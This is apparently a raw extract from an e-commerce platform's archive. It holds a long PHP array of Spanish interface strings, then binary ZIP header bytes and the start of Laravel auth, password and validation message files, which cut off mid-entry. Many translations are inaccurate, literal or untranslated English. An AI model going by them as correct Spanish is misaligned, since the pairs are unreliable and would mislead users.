'some_status_buttons_are_disabled_because_the_admin_added_coupons' => 'algunos botones de estado están deshabilitados porque el administrador agregó cupones', 'the_coupon_discount_bearer_is_admin' => 'el portador del cupón de descuento es admin', 'or_some_coupons_are_for_all_sellers' => 'o algunos cupones son para todos los vendedores', 'some_actions_are_disabled_because_the_admin_added_coupons' => 'algunas acciones están deshabilitadas porque el administrador agregó cupones', 'seller_is_required!' => 'vendedor es requerido!', 'customer_is_required!' => '¡el cliente es requerido!', 'coupon_added_successfully!' => 'cupón agregado con éxito!', 'coupon_status_updated' => 'cupón status actualizado', 'discount_on_purchase' => 'descuento en compra', 'minimum purchase' => 'compra mínima', 'maximum discount' => 'descuento máximo', 'coupon_updated_successfully' => 'cupón actualizado con éxito', 'coupon_deleted_successfully' => 'cupón eliminado con éxito', 'cancel_order' => 'cancelar orden', 'sorry_product_out_of_stock' => 'lo siento producto agotado de stock', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart' => 'La cantidad del producto no puede ser cero o menos de cero en el carrito', 'Product_quantity_updated' => 'Producto cantidad actualizado', 'customer Name' => 'Nombre del cliente', 'search_customers' => 'buscar clientes', 'no_message_available' => 'no hay mensajes disponibles', 'no_conversation_found' => 'no se encontró ninguna conversación', 'active_Products' => 'productos activos', 'inactive_Products' => 'productos inactivos', 'pending_Products' => 'productos pendientes', 'search_by_orders_id_or_transaction_ID' => 'buscar por ID de pedidos o ID de transacción', 'oder_Transaction_Statement' => 'Declaración de transacción de pedido', 'delivered_By' => 'entregado por', 'total_Product_Amount' => 'cantidad producto total', 'discounted_Amount' => 'importe rebajado', 'order_Amount' => 'Total de la orden', 'additional_Information' => 'información adicional', 'totals' => 'totales', 'admin_Discount' => 'admin Descuento', 'seller_Discount' => 'vendedor descuento', 'seller_Net_Income' => 'vendedor Neto Ingresos', 'completed_Orders' => 'pedidos completados', 'ongoing_Orders' => 'pedidos en curso', 'canceled_Orders' => 'pedidos cancelados', 'total_Ordered_Product_Price' => 'precio del producto total pedido', 'total_Product_Discount' => 'descuento total del producto', 'total_Coupon_Discount' => 'cupón descuento total', 'total_Discounted_Amount' => 'importe total con descuento', 'total_Delivery_Charge' => 'cargo entrega total', 'additional' => 'adicional', 'information' => 'Information', 'product_report' => 'informe producto', 'products_Stock' => 'productos Stock', 'In-Stock' => 'En stock', 'cash_Payment' => 'pago en efectivo', 'add_Shipping' => 'añadir Envío', 'order_wise_shipping_method_status_updated_successfully' => 'el estado del método de envío inteligente del pedido se actualizó con éxito', 'shipping_Method_deleted_successfully' => 'método de envío eliminado con éxito', 'discounted' => 'Discounted', 'edit_Shipping' => 'Editar envío', 'shipping_method_update' => 'actualización método envío', 'top rated' => 'los más valorados', 'top-rated' => 'los más valorados', 'once_deleted_you_will_not_be_able_to_recover_this' => 'una vez borrado usted no podrá recuperar esto', 'bank_Info_View' => 'Vista de información bancaria', 'bank_Information' => 'información bancaria', 'holder_Name' => 'nombre del titular', 'bank_Name' => 'Nombre del banco', 'branch_Name' => 'nombre sucursal', 'account_Number' => 'número de cuenta', 'bank_Info' => 'información bancaria', 'edit_Bank_info' => 'editar información bancaria', 'edit_Bank_Info' => 'editar información bancaria', 'account_No' => 'cuenta No', 'shop_view' => 'vista de la tienda', 'by_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'al activar el modo de cierre temporal su tienda aparecerá como desactivada temporalmente en el sitio web y la aplicación para los clientes. ellos no pueden comprar o realizar pedidos en su tienda', 'my_shop_info' => 'mi tienda info', 'are_you_sure_Change_this' => 'estás seguro de cambiar esto', 'temporary_close_inactive_successfully' => 'cierre temporal inactivo con éxito', 'shop_Edit' => 'tienda Editar', 'edit_Shop_Info' => 'editar información de la tienda', 'country_code_is_must_like_for_BD_880' => 'código país es must like for BD 880', 'Secondary' => 'Secondary', 'Ratio' => 'Relación', 'file' => 'archivo', 'add_new_deliveryman' => 'agregar nuevo repartidor', 'identity_type' => 'Tipo de identidad', 'driving_license' => 'licencia de conducir', 'company_id' => 'ID de la compañía', 'identity_number' => 'número de identidad', 'add_deliveryman' => 'add repartidor', 'update_deliveryman' => 'actualización repartidor', 'back_to_delivery-man_list' => 'volver a la lista de-repartidores', 'Delivery_Man_Account' => 'Cuenta de repartidor', 'Amount_receive_successfully!' => '¡Importe recibido con éxito!', 'history_of_Order_No' => 'historia del pedido no', 'Search' => 'Buscar', 'delivery_man_Review' => 'repartidor reseña', 'select_Rating' => 'seleccionar puntuación', 'add_new_contact_information' => 'agregar nueva información de contacto', 'emergency_contact_added_successfully!' => '¡contacto de emergencia agregado con éxito!', 'emergency_contact_deleted_successfully!' => '¡El contacto de emergencia se eliminó con éxito!', 'contact_status_changed_successfully!' => '¡El estado de contacto cambió con éxito!', 'new_Password' => 'Nueva contraseña', 'confirm_Password' => 'confirmar Contraseña', 'Review' => 'Revisar', 'Submit_a_review' => 'Enviar una reseña', 'Comment' => 'Comentario', 'Leave_a_comment' => 'Deja un comentario', 'File_type:_jpg_jpeg_png._Maximum_size:_2MB' => 'Tipo de archivo: jpg jpeg png. Tamaño máximo: 2MB', 'no_delivery_man_assigned_yet' => 'no repartidor asignado todavía', 'you_can_review_after_the_product_is_delivered!' => 'puede revisar después de que se entregue el producto!', 'you_can_refund_request_after_the_product_is_delivered!' => '¡Puede reembolsar la solicitud después de que se entregue el producto!', 'Order_placed' => 'Pedido realizado', 'Packaging_order' => 'Pedido de empaque', 'Order_is_on_the_way' => 'El pedido está en camino', 'Order_Delivered' => 'Pedido Entregado', 'successfully_added_review' => 'revisión agregada correctamente', 'this_shop_is_temporary_closed_or_on_vacation' => 'esta tienda está cerrada temporalmente o de vacaciones', 'You_cannot_add_product_to_cart_from_this_shop_for_now' => 'You cannot add product to cart from this shop for now', 'similar_product_not_available' => 'producto similar no disponible', 'no_items_in_basket' => 'no hay artículos en la cesta', 'want_to_delete_this_address' => 'quiero borrar esta dirección', 'want_to_delete_this_account' => 'quiero borrar esta cuenta', 'want_to_clear_all_wishlist' => 'quiero borrar toda la lista de deseos', 'want_to_clear_all_compare_list' => 'quiero borrar todo comparar lista', 'want_to_cancel_this_order' => 'quiero cancelar este pedido', 'im_not_a_robot_checkbox' => 'no soy una casilla de robot', 'sign_in' => 'iniciar sesión', 'admin_or_Employee_Login' => 'inicio de sesión de administrador o empleado', 'your_email' => 'Tu correo electrónico', '8+_characters_required' => 'Se requieren más de 8 caracteres', 'please_check_the_recaptcha' => 'por favor revise el recaptcha', 'page_Not_found' => 'página no encontrada', 'we_are_sorry' => 'lo sentimos', 'the_page_you_requested_could_not_be_found' => 'la página que solicitó no podría encontrarse', 'please_go_back_to_the_homepage' => 'por favor vuelve a la página de inicio', 'pay_by_wallet' => 'pagar por billetera', 'Order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'El pedido ya se entregó y el monto de la transacción ha sido desembolsado cambiando el estado puede ser la razón de un error de cálculo', 'delivery_info' => 'entrega info', 'wish_listed' => 'lista de deseos', 'add_to_cart' => 'añadir a la cesta', 'excellent' => 'excelente', 'good' => 'bien', 'average' => 'promedio', 'below_Average' => 'por debajo de la media', 'poor' => 'pobre', 'product_review' => 'revision de producto', 'safe_Payment' => 'pago seguro', '7_Days_Return_Policy' => 'Política de devolución de 7 días', 'visit_Store' => 'visita la tienda', 'more_From_The_Store' => 'más De La Tienda', 'similar_products' => 'productos similares', 'no_more_review_remain_to_load' => 'no queda más revisión para cargar', 'expand_Menu' => 'expandir Menú', 'hello' => 'Hola', 'my_cart' => 'mi carrito', 'expand_cart' => 'ampliar carro', 'checkout' => 'verificar', 'view_more' => 'ver más', 'seller_zone' => 'vendedor zona', 'become_a_seller' => 'convertirse en vendedor', 'seller_login' => 'vendedor login', 'about_Company' => 'Acerca de la compañía', 'contact_Us' => 'Contáctenos', 'download_our_app' => 'descargar nuestra aplicación', 'special' => 'especial', 'featured_products' => 'Productos Destacados', 'latest_products' => 'Latest products', 'best_selling_product' => 'producto superventas', 'top_rated_product' => 'producto mejor calificado', 'account_&_shipping_info' => 'información de cuenta & envío', 'profile_info' => 'Profile info', 'newsletter' => 'Boletin informativo', 'subscribe_to_our_new_channel_to_get_latest_updates' => 'suscríbase a nuestro nuevo canal para obtener las últimas actualizaciones', 'your_Email_Address' => 'Su dirección de correo electrónico', 'subscribe' => 'suscribir', 'start_a_conversation' => 'iniciar una conversación', 'terms_&_conditions' => 'Términos y condiciones', 'currency_changed_to' => 'moneda cambiada a', 'sorry_the_minimum_order_quantity_does_not_match' => 'Lo sentimos, la cantidad mínima de pedido no coincide', 'sorry_stock_limit_exceeded.' => 'Lo sentimos, límite de existencias excedido.', 'online_Shopping' => 'Online Shopping', 'previous' => 'anterior', 'featured_deal' => 'oferta presentada', 'see_the_latest_deals_and_exciting_new_offers' => 'See the latest deals and exciting new offers', 'recommended_product' => 'producto recomendado', 'ARRIVALS' => 'LLEGADAS', 'best_sellings' => 'superventas', 'top_rated' => 'los más valorados', 'fast_delivery_all_accross_the_country' => 'entrega rápida en todo el país', 'safe_payment' => 'pago seguro', 'feature_Deal_Update' => 'Actualización de la oferta de características', 'update_feature_deal' => 'oferta de características de actualización', 'check' => 'controlar', 'not_Seen_Yet' => 'no visto aún', 'asdfgh' => 'Asdfgh', 'Feedback_Update_successfully' => 'Feedback Update successfully', 'Partner request' => 'Solicitud de socio', 'processing' => 'Procesando', 'Configuration_updated_successfully' => 'Configuration updated successfully', 'profile_Info' => 'Profile Info', 'my_wallet' => 'mi billetera', 'my_loyalty_point' => 'mi punto de lealtad', 'wish_list' => 'lista de deseos', 'chat_with_seller' => 'chat con el vendedor', 'chat_with_delivery-man' => 'chat con el repartidor', 'image_ratio_should_be' => 'image ratio should be', 'phone_number' => 'Phone number', 'country_code_is_must_like_for_BD' => 'código país es debe gustar para BD', 'show_password' => 'mostrar contraseña', 'delete_account' => 'borrar cuenta', 'please_ReType_Password' => 'por favor vuelva a escribir la contraseña', 'passwords_do_not_match' => 'Las contraseñas no coinciden', 'passwords_match' => 'Las contraseñas coinciden', 'my_Order_List' => 'mi lista de pedidos', 'order_date' => 'fecha de orden', 'pos_order' => 'pos pedido', 'write_something' => 'escribe algo', 'go_to_chatbox' => 'ir a chatbox', 'generate_invoice' => 'generar factura', 'track_Order' => 'orden de pista', 'POS_order' => 'POS pedido', 'no.' => 'No.', 'order_No' => 'n º de pedido', 'my_Order' => 'mi pedido', 'estimated_Delivary_Date' => 'Fecha de entrega estimada', 'first_step' => 'primer paso', 'order_placed' => 'pedido realizado', 'second_step' => 'Second step', 'packaging_order' => 'embalaje pedido', 'third_step' => 'tercer paso', 'preparing_Shipment' => 'preparando envío', 'fourth_step' => 'cuarto paso', 'order_Shipped' => 'orden enviada', 'view_Order_Details' => 'Ver detalles de la orden', 'my_Wallet' => 'mi billetera', 'transaction_history' => 'Historial de transacciones', 'wallet_amount' => 'monedero cantidad', 'order place' => 'lugar de pedido', 'loyalty point' => 'punto de fidelidad', 'order refund' => 'reembolso del pedido', 'add fund by admin' => 'añadir fondo por administrador', 'loyalty_point_history' => 'historial de puntos de lealtad', 'total_loyalty_point' => 'total lealtad punto', 'minimum_point_for_convert_to_currency_is' => 'punto mínimo para convertir a moneda es', 'track_Order_Result' => 'track Order Result', 'your_phone_number' => 'su número de teléfono', 'my_Wishlists' => 'mi lista de deseos', 'chat_with_delivery_man' => 'chat con repartidor', 'my_Address' => 'mi dirección', 'add_new_address' => 'agregar nueva dirección', 'office' => 'oficina', 'billing' => 'facturación', 'contact_person_name' => 'Nombre del Contacto', 'add_informations' => 'agregar informaciones', 'addresses' => 'direcciones', 'Billing_address' => 'Dirección de Envio', 'are_you_sure_you_want_to_delete' => 'estas seguro que quieres borrarlo', 'update_address' => 'actualización dirección', 'state' => 'estado', 'address_update_successfully' => 'actualización de dirección con éxito', 'all_input_field_required' => 'todos los campos de entrada requeridos', 'UPDATE_ADDRESSES' => 'ACTUALIZAR DIRECCIONES', 'Data_updated_successfully!' => '¡Datos actualizados con éxito!', 'website_problem' => 'sitio web problema', 'complaint' => 'queja', 'info_inquiry' => 'info consulta', 'submit_a_ticket' => 'Envía un boleto', 'topic' => 'tema', 'submition_date' => 'fecha de presentación', 'do_you_want_to_delete_this' => 'quieres borrar esto', 'Do_not_delete' => 'No borres', 'add_new_ticket' => 'añadir nuevo ticket', 'support_Ticket_Answer' => 'support Ticket Answer', 'date_Submitted' => 'Date Submitted', 'last_updated' => 'última actualización', 'please_write_the_message' => 'por favor escribe el mensaje', 'submit_message' => 'enviar mensaje', 'shipping_Fee' => 'gastos de envío', 'All_Seller_Page' => 'Toda la página del vendedor', 'all_Sellers' => 'todos los vendedores', 'shop_Page' => 'tienda pagina', 'search_products_from_this_store' => 'buscar productos de esta tienda', 'out_of_stock' => 'Agotado', 'out_of_stock!' => '¡Agotado!', 'My_Shopping_Cart' => 'Mi carrito de compras', 'shopping_cart' => 'carro de la compra', 'continue_shopping' => 'seguir comprando', 'please_provide_coupon_code' => 'por favor proporcionar código de cupón', 'apply_code' => 'Aplica el código', 'days_free_delivery' => 'Days free delivery', 'money_back_guarantee' => 'Garantía de devolución del dinero', 'genuine_product' => 'Genuine product', 'authentic_payment' => 'Authentic payment', 'shipping_Address' => 'Shipping Address', 'and_billing' => 'y facturacion', 'choose_shipping_address' => 'elegir dirección de envío', 'edit_address' => 'Editar dirección', 'another_address' => 'Otra dirección', 'address_type' => 'Tipo de dirección', 'save_this_address' => 'Save this address', 'choose_billing_address' => 'elegir dirección de facturación', 'same_as_shipping_address' => 'misma que la dirección de envío', 'shop_cart' => 'carro de la tienda', 'proceed_payment' => 'proceder pago', 'choose_Payment_Method' => 'elige el método de pago', 'choose_payment' => 'elegir pago', 'error' => 'error', 'back_to_shipping' => 'volver a envío', 'you_do_not_have_sufficient_balance_for_pay_this_order!!' => '¡¡usted no tiene saldo suficiente para pagar este pedido!!', 'payment_by' => 'pago por', 'payment_note' => 'nota de pago', 'redirecting_to_the_payment' => 'redirigir al pago', 'inhouse_products' => 'productos internos', 'order_Complete' => 'orden completada', 'your_order_has_been_placed_successfully' => 'su pedido ha sido realizado con éxito', 'Hello' => 'Hello', 'you_order_has_been_confirmed_and_will_be_shipped_according_to_the_method_you_selected' => 'su pedido ha sido confirmado y será enviado según el método que seleccionó', 'go_to_shopping' => 'ir de compras', 'check_orders' => 'cheque pedidos', 'successfully_canceled' => 'cancelado con éxito', 'order wise seller shipping' => 'Order wise seller shipping', 'refund_request' => 'petición para reembolso', 'submit_a_review' => 'enviar una revisión', 'comment' => 'comentario', 'file_type' => 'Tipo de archivo', 'maximum size' => 'talla máxima', 'total_refundable_amount' => 'monto total reembolsable', 'refund_requested_successful!!' => '¡¡reembolso solicitado con éxito!!', 'refund_pending' => 'reembolso pendiente', 'uploaded_file' => 'archivo subido', 'type_something!' => '¡escribe algo!', 'ame' => 'Ame', 'language_change_successfully' => 'Language change successfully', 'monitor_your_business_analytics_and_statistics' => 'Monitor your business analytics and statistics', 'order_statistics' => 'Order statistics', 'vendor' => 'proveedor', 'user_overview' => 'descripción general usuario', 'user' => 'usuario', 'most_Popular_Products' => 'Most Popular Products', 'order_delivered' => 'Order delivered', 'logo' => 'Logo', 'image_description' => 'Image description', 'product_Attribute_Setup' => 'Product Attribute Setup', 'in-House_Products' => 'In-House Products', 'Product_List' => 'Product List', 'vendor_Products' => 'proveedor Productos', 'new_Products_Requests' => 'New Products Requests', 'product_update_requests' => 'Product update requests', 'banner_Setup' => 'Banner Setup', 'send_notification' => 'Send notification', 'send_notification_svg' => 'Send notification svg', 'push_notifications_setup' => 'Push notifications setup', 'push_notification_svg' => 'Push notification svg', 'Menu' => 'Menu', 'Promotional_Banners' => 'Promotional Banners', 'All_Pages_Banner' => 'All Pages Banner', 'Most_Demanded_Product' => 'Most Demanded Product', 'Features_Section' => 'Features Section', 'help_&_support' => 'Help & support', 'inbox' => 'Inbox', 'vendor_Sales' => 'vendedor ventas', 'wallet_Bonus_Setup' => 'wallet Bonus Setup', 'vendors' => 'vendedores', 'add_New_Vendor' => 'Add New Vendor', 'vendor_List' => 'lista de proveedores', 'delivery_men' => 'Delivery men', 'business_Settings' => 'Business Settings', 'in-house_Shop' => 'In-house Shop', 'login_Settings' => 'Login Settings', 'themes_&_Addons' => 'Themes & Addons', '3rd_Party' => 'Tercera parte', 'payment_methods' => 'Payment methods', 'other_Configurations' => 'Other Configurations', 'business_Pages' => 'Business Pages', 'React_website_configuration' => 'React website configuration', 'deleted_successfully' => 'Deleted successfully', 'The_file_upload_field_is_required' => 'The file upload field is required', 'select_country' => 'Select country', 'minimum_amount_can_not_be_greater_than_maximum_amount' => 'Minimum amount can not be greater than maximum amount', 'the_file_upload_field_is_required' => 'The file upload field is required', 'status_updated_failed' => 'Status updated failed', 'do_you_want_to_sign_out' => 'Do you want to sign out', 'do_not_Logout' => 'Do not Logout', 'want_to_change_this_language' => 'quiero cambiar este idioma', 'please_enter_a_valid_integer_for_current_stock' => 'Please enter a valid integer for current stock', 'at_least_8_characters' => 'At least 8 characters', 'at_least_one_uppercase_letter_' => 'At least one uppercase letter ', 'at_least_one_number' => 'At least one number', 'at_least_one_symbol' => 'At least one symbol', 'please_fill_out_this_field' => 'Please fill out this field', 'online_shopping' => 'Online shopping', 'search_for_items' => 'Search for items', 'most_visited_categories' => 'Most visited categories', 'hours' => 'Hours', 'minutes' => 'Minutes', 'seconds' => 'Seconds', 'See_all' => 'See all', 'in_stock' => 'In stock', 'sorry' => 'Lo siento', 'limited_Stock' => 'Stock limitado', 'recommended_for_you' => 'Recommended for you', 'latest_product' => 'Latest product', 'most_searching' => 'Most searching', 'see_all' => 'See all', 'promo' => 'Promo', 'do_not_miss_todays_deal' => 'Do not miss todays deal', 'stock_available' => 'stock disponible', 'shop_now' => 'Compra ahora', 'featured_Products' => 'Featured Products', 'all_products' => 'All products', 'delivery' => 'Delivery', 'all_categories' => 'All categories', 'price_range' => 'Price range', '0.00' => '0.00', '10 00000' => '10 00000', 'by_review_rating' => 'By review rating', 'best_selling' => 'Best selling', 'most_loved' => 'Most loved', 'Feature_Deal' => 'Feature Deal', 'Feature_Deal_for_this_season' => 'Feature Deal for this season', 'find_your_best_featured_deal_product' => 'Find your best featured deal product', 'see_all_products' => 'See all products', 'top_Fashion_House' => 'top Fashion House', 'visit' => 'visita', 'most_demanded' => 'Most demanded', 'most_demanded_product' => 'Most demanded product', 'product_of_this_year' => 'Product of this year', 'wishes' => 'deseos', 'other_stores' => 'Other stores', 'top_rated_vendor' => 'Top rated vendor', 'new_vendor' => 'New vendor', 'others_store' => 'Others store', 'visit_shop' => 'visitar tienda', 'loader' => 'Loader', 'Dark_Mode' => 'Dark Mode', 'dark_Mode' => 'Dark Mode', 'Light_Mode' => 'Light Mode', 'light_Mode' => 'Light Mode', 'become_a_vendor' => 'Become a vendor', 'all_brand' => 'All brand', 'vendor_reg' => 'proveedor reg', 'search_for_items_or_store' => 'Search for items or store', 'Customers_will_not_be_able_to_select_COD_as_a_payment_method_during_checkout' => 'Customers will not be able to select COD as a payment method during checkout', 'please_review_your_settings_and_enable_COD_if_you_wish_to_offer_this_payment_option_to_customers' => 'Please review your settings and enable COD if you wish to offer this payment option to customers', 'compare' => 'Compare', 'be_the_first_one_to_know_about_discounts_offers_and_events' => 'Be the first one to know about discounts offers and events', 'enter_your_email' => 'Enter your email', 'read_more' => 'Read more', 'hotline' => 'Hotline', 'accounts' => 'Accounts', 'refer_&_earn' => 'refer & earn', 'FAQs' => 'FAQs', 'quick_links' => 'Quick links', 'sell_on' => 'Sell on', 'support' => 'apoyo', 'live_chat' => 'Live chat', 'contact_us' => 'Contact us', 'popular_tags' => 'Popular tags', 'apple' => 'Apple', 'cannot_Use_0_only' => 'Cannot Use 0 only', 'Out_Of_Stock' => 'Out Of Stock', 'minimum_order_quantity_cannot_be_less_than' => 'Minimum order quantity cannot be less than', 'OTP_has_been_sent_again' => 'OTP has been sent again', 'please_wait_for_new_code' => 'Please wait for new code', 'now' => 'Now', 'successfully_copied' => 'Successfully copied', 'no_discount' => 'No discount', 'stock_not_available' => 'stock no disponible', 'update_this_Address' => 'Update this Address', 'your_password_must_be_at_least_8_characters' => 'tu contraseña debe ser al menos 8 caracteres', 'password_does_not_Match' => 'Password does not Match', 'please_select_a_payment_Methods' => 'Please select a payment Methods', 'you_can_review_after_the_product_is_delivered' => 'usted puede revisar después de la entrega del producto', 'you_can_refund_request_after_the_product_is_delivered' => 'usted puede solicitud de reembolso después de entregar el producto ', 'This_shop_is_temporary_closed_or_on_vacation' => 'This shop is temporary closed or on vacation', 'Chat_with_us_on_WhatsApp' => 'Chat with us on WhatsApp', 'thanks' => 'gracias', 'accept_All_Cookies' => 'Accept All Cookies', 'Environment_Settings' => 'Environment Settings', 'software_Update' => 'Software Update', 'Currency' => 'Currency', 'cookies' => 'Cookies', 'site_Map' => 'mapa sitio', 'environment_information' => 'Environment information', 'app_name' => 'App name', 'EFood' => 'EFood', 'app_debug' => 'App debug', 'app_mode' => 'App mode', 'app_url' => 'App url', 'DB_connection' => 'DB connection', 'DB_host' => 'DB host', 'DB_port' => 'DB port', 'DB_database' => 'DB database', 'DB_username' => 'DB username', 'root' => 'Root', 'DB_password' => 'DB password', 'buyer_username' => 'Buyer username', '6valley-admin-demo-jhisdfhisufjifjfijqw5467' => '6valley-admin-demo-jhisdfhisufjifjfijqw5467', '00000000000000' => '00000000000000', 'after_adding_a_new_language _you_need_to_translate_the_key_contents_for_users_to_experience_this_feature' => 'After adding a new language you need to translate the key contents for users to experience this feature', 'to_translate_a_language_click_the_action_button_from_the_language_table_&_click_translate' => 'To translate a language click the action button from the language table & click translate', 'then_change_the_key_language_value_manually_or_click_the_‘Auto_Translate’_button' => 'Then change the key language value manually or click the ‘Auto Translate’ button', 'Finally _click_‘Update’_to_save_the_changes' => 'Finally click ‘Update’ to save the changes', 'default_language_can_not_be_deactive' => 'Default language can not be deactive', 'want_to_Turn_ON_Language_Status' => 'want to Turn ON Language Status', 'want_to_Turn_OFF_Language_Status' => 'want to Turn OFF Language Status', 'if_enabled_this_language_will_be_available_throughout_the_entire_system' => 'If enabled this language will be available throughout the entire system', 'if_disabled_this_language_will_be_hidden_from_the_entire_system' => 'If disabled this language will be hidden from the entire system', 'want_to_Change_Default_Language_Status' => 'want to Change Default Language Status', 'if_enabled_this_language_will_be_set_as_default_for_the_entire_system' => 'If enabled this language will be set as default for the entire system', 'if_disabled_this_language_will_be_unset_as_default_for_the_entire_system' => 'If disabled this language will be unset as default for the entire system', 'LTR' => 'LTR', 'RTL' => 'RTL', 'Loading' => 'Loading', 'showing' => 'Showing', 'To' => 'To', 'entries' => 'Entries', 'filtered' => 'Filtered', 'total_entries' => 'entradas totales', 'no_matching_data_found' => 'No matching data found', 'show' => 'espectáculo', 'first' => 'First', 'last' => 'Last', 'sort_by' => 'Ordenar por', 'a_to_z_order' => 'A to z order', 'z_to_a_order' => 'z to a order', 'low_to_high_price' => 'Low to high price', 'high_to_low_price' => 'High to low price', 'filter_by' => 'Filter by', 'z_to_a_Order' => 'z to a Order', 'clear_all' => 'Clear all', 'all_brands_page' => 'página todas marcas', 'search_brand' => 'marca buscadora', 'similar_category_product' => 'producto de categoría similar', 'share' => 'compartir', 'no_review' => 'no revisión', 'limited_stock' => 'Stock limitado', 'category_tag' => 'categoría etiqueta', 'update_cart' => 'actualización de la compra', 'total_price_for_this_product' => 'precio total para este producto', 'vat' => 'IVA', 'start_from' => 'empezar desde', 'ask_about_this_product' => 'preguntar sobre este producto', 'view_less' => 'sin vista', 'not_reviewed_yet' => 'aún no revisado', 'sorry_no_review_found_to_show_you' => 'lo siento no review found to show you', 'top_rated_product_from_this_store' => 'top rate product from this store', 'similar_product_from_this_store' => 'producto similar de esta tienda', 'you_may_also_like' => 'También te puede interesar', 'all_stores' => 'todas las tiendas', 'store_list' => 'lista de la tienda', 'rating_High_to_Low' => 'calificación alta a baja', 'rating_Low_to_High' => 'calificación baja a alta', 'highest_Products' => 'productos más altos', 'lowest_Products' => 'productos más bajos', 'search_store' => 'tienda búsqueda', 'ex_:_7+_character' => 'ex : 7+ carácter', 'forgot_password' => 'Has olvidado tu contraseña', 'enter_captcha_value' => 'ingresar captcha value', 'captcha' => 'captcha', 'social' => 'social', 'enjoy_new_experience' => 'disfrutar nueva experiencia', 'Jhone' => 'Jhone', 'ex:' => 'Ex:', 'Doe' => 'Doe', 'enter_email_address' => 'introducir la dirección de correo electrónico', 'refer_code' => 'código referencia', 'use_referral_code' => 'usar código referencia', 'by_clicking_sign_up_you_are_agreed_with_our' => 'By clicking sign up you are agreed with our', 'terms_&_policy' => 'términos & política', 'have_an_account' => 'tener una cuenta', 'Customer_Added_Successfully' => 'Cliente agregado con éxito', 'welcome_to' => 'Bienvenido a', 'sign_Out' => 'desconectar', 'delete_profile' => 'Borrar perfil', 'joined' => 'unido', 'in_compare' => 'en comparar', 'my_wishlist' => 'mi lista de deseos', 'my_compare_list' => 'mi lista comparada', 'refer_&_Earn' => 'Refer & Earn', 'search_by_order_ID' => 'buscar por pedido ID', 'no_Order_Found' => 'no Order Found', 'you_have_not_placed_any__order_yet' => 'todavía no has realizado ningún pedido ', 'my_wishlists' => 'mi lista de deseos', 'search_by_name_or_category' => 'buscar por nombre o categoría', 'no_Saved_Products_Found' => 'no productos guardados encontrados', 'you_have_not_add_any_products_in_Wishlist ' => 'no tienes agregar ningún producto en la lista de deseos', 'personal_details' => 'detalles personales', 'edit_profile' => 'Editar perfil', 'my_address' => 'mi dirección', 'trash' => 'basura', 'add_address' => 'añadir dirección', 'my_order_details' => 'detalles de mi pedido', 'reorder' => 'Reorder', 'Verification_Code' => 'Código de verificación', 'order_summary' => 'resumen pedido', 'vendor_info' => 'información proveedor', 'delivery_man_info' => 'entrega hombre info', 'leave_a_comment' => 'Deja un comentario', 'file_type_jpg_jpeg_png' => 'File type jpg jpeg png', 'maximum_size_2MB' => 'tamaño máximo 2MB', 'shipping_fee' => 'gastos de envío', 'download_failed' => 'Descarga fracasó', ); PK ! ]��� � sa/auth.phpnu �[��� <?php return [ 'failed' => 'These credentials do not match our records.', 'throttle' => 'Too many login attempts. Please try again in :seconds seconds.', ]; PK ! *sN, , sa/passwords.phpnu �[��� <?php return [ 'reset' => 'Your password has been reset!', 'sent' => 'We have e-mailed your password reset link!', 'throttled' => 'Please wait before retrying.', 'token' => 'This password reset token is invalid.', 'user' => 'We can\'t find a user with that e-mail address.', ]; PK ! �Q�� � sa/validation.phpnu �[��� <?php return [ 'accepted' => 'The :attribute must be accepted.', 'active_url' => 'The :attribute is not a valid URL.', 'after' => 'The :attribute must be a date after :date.', 'after_or_equal' => 'The :attribute must be a date after or equal to :date.', 'alpha' => 'The :attribute may only contain letters.', 'alpha_dash' => 'The :attribute may only contain letters, numbers, dashes and underscores.', 'alpha_num' => 'The :attribute may only contain letters and numbers.', 'array' => 'The :attribute must be an array.', 'attributes' => [ ], 'before' => 'The :attribute must be a date before :date.', 'before_or_equal' => 'The :attribute must be a date before or equal to :date.', 'between' => [ 'array' => 'The :attribute must have between :min and :max items.', 'file' => 'The :attribute must be between :min and :max kilobytes.', 'numeric' => 'The :attribute must be between :min and :max.', 'string' => 'The :attribute must be between :min and :max characters.', ], 'boolean' => 'The :attribute field must be true or false.', 'confirmed' => 'The :attribute confirmation does not match.', 'custom' => [ 'attribute-name' => [ 'rule-name' => 'custom-message', ], ], 'date' => 'The :attribute is not a valid date.', 'date_equals' => 'The :attribute must be a date equal to :date.', 'date_format' => 'The :attribute does not match the format :format.', 'different' => 'The :attribute and :other must be different.', 'digits' => 'The :attribute must be :digits digits.', 'digits_between' => 'The :attribute must be between :min and :max digits.', 'dimensions' => 'The :attribute has invalid image dimensions.', 'distinct' => 'The :attribute field has a duplicate value.', 'email' => 'The :attribute must be a valid email address.', 'ends_with' => 'The :attribute must end with one of the following: :values.', 'exists' => 'The selected :attribute is invalid.', 'file' => 'The :attribute must be a file.', 'filled' => 'The :attribute field must have a value.', 'gt' => [ 'array' => 'The :attribute must have more than :value items.', 'file' => 'The :attribute must be greater than :value kilobytes.', 'numeric' => 'The :attribute must be greater than :value.', 'string' => 'The :attribute must be greater than :value characters.', ], 'gte' => [ 'array' => 'The :attribute must have :value items or more.', 'file' => 'The :attribute must be greater than or equal :value kilobytes.', 'numeric' => 'The :attribute must be greater than or equal :value.', 'string' => 'The :attribute must be greater than or equal :value characters.', ], 'image' => 'The :attribute must be an image.', 'in' => 'The selected :attribute is invalid.', 'integer' => 'The :attribute must be an integer.', 'in_array' => 'The :attribute field does not exist in :other.', 'ip' => 'The :attribute must be a valid IP address.', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => 'The :attribute must be a valid JSON string.', 'lt' => [ 'array' => 'The :attribute must have less than :value items.', 'file' => 'The :attribute must be less than :value kilobytes.', 'numeric' => 'The :attribute must be less than :value.', 'string' => 'The :attribute must be less than :value characters.', ], 'lte' => [ 'array' => 'The :attribute must not have more than :value items.', 'file' => 'The :attribute must be less than or equal :value kilobytes.', 'numeric' => 'The :attribute must be less than or equal :value.', 'string' => 'The :attribute must be less than or equal :value characters.', ], 'max' => [ 'array' => 'The :attribute may not have more than :max items.', 'file' => 'The :attribute may not be greater than :max kilobytes.', 'numeric' => 'The :attribute may not be greater than :max.', 'string' => 'The :attribute may not be greater than :max characters.', ], 'mimes' => 'The :attribute must be a file of type: :values.', 'mimetypes' => 'The :attribute must be a file of type: :values.', 'min' => [ 'array' => 'The :attribute must have at least :min items.', 'file' => 'The 